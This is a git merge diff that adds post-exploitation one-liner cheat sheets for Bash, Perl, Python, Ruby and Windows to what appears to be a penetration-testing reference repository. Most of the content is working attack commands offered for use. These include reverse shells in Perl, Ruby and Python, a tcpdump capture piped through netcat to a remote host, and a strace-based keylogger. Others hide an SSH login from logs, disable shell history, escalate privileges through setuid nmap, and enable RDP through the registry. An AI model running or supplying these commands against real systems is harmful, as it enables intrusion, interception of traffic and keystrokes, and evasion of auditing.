Merge pull request #45 from tekwizz123/master

Add CLI kungfu from @pentestcli

scripting/bash.md

@@ -0,0 +1,82 @@
+# Bash Commands for Post Exploitation
+
+One liners
+-----------
+
+**Resolve a list of hostnames to IP addresses**
+```bash
+awk < hostnames.txt '{ system("resolveip -s " $1) }'```
+
+**IIS 6.0 IP Disclosure**
+```bash
+curl -l -O -H "Host:" "example.com"```
+
+**Connect to SSL websites**
+```bash
+openssl s_client -connect example.com:443```
+
+**Convert base64 to text**
+```bash
+echo 'base64string' | base64 -d   (Use -D on OSX)```
+
+**Decode ASCII shellcode**
+```bash
+echo -e *shellcode hex string*   (may need to use -i to ignore bad chars)```
+
+**Enumerate DNS of Class C**
+```bash
+for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done```
+
+**SSH to box and hide from "who" and "lastlog"**
+```bash
+ssh andrew@10.1.1.1 -T /bin/bash```
+
+**Prevent terminal logging**
+```bash
+unset HISTFILE```
+
+**Add immutable attribute to a unix file**
+```bash
+chattr +i *file*```
+
+**SSH into host2 through host1**
+```bash
+ssh -o "proxycommand ssh -W host2 host1" host2```
+
+**Nmap setuid privesc**
+```bash
+nmap --script <(echo 'os.execute("/bin/sh")')
+nmap --interactive     (for older versions)```
+
+**Transfer files through SSH**
+```bash
+ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz```
+
+**Internal port redirect for bypassing services**
+```bash 
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444```
+
+**Enable forwarding on the fly**
+```bash
+sysctl -w net.ipv4.ip_forward=1```
+
+**Kill with USR1 developer defined signal**
+```bash
+kill -USR1 <pid>```
+
+**Pull IP addresses from a file**
+```bash
+grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'```
+
+**Sniff traffic with tcpdump and send to remote tcp socket**
+```bash
+tcpdump -w - | nc -v 8.8.8.8 9999```
+
+**Recursively search for files within a directory**
+```bash
+zcat -rf ./* | grep "searchstring"
+
+Credits
+-----------
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
+

scripting/perl.md

@@ -2,4 +2,10 @@
 
 **Perl reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
 
-```perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```
+```perl 
+perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```
+
+**Running proc keylogger**
+```perl
+strace -p $PID -f -eread -o '| perl -ne'\"BEGIN{$|=1}my($i)=/\(0,"([^"]*)"/;print$i'\'```
+

scripting/python.md

@@ -18,3 +18,7 @@ python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.sock
 **Spawn bash shell prompt**
 ```python
 python -c 'import pty; pty.spawn("/bin/bash")'```
+
+***Print all ASCII characters***
+```python
+python -c 'import string; print string.printable'```

scripting/ruby.md

@@ -10,3 +10,9 @@ ruby -run -e httpd -- -p 8001 .```
 **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
 ```ruby 
 ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
+
+***URL Encode***
+```ruby
+ruby -e 'require "open-uri"; result = URI.escape(YOUR STRING HERE, Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))'```
+
+

scripting/windows.md

@@ -0,0 +1,16 @@
+# Windows Commands for Post Exploitation
+
+One liners
+-----------
+**Tunnel traffic natively with windows**
+```bash
+netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80
+
+**Launch cmd.exe as local system w/ psexec**
+psexec -s cmd.exe
+
+**Enable rdp with CLI**
+reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+
+**Launch ARP scan**
+for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i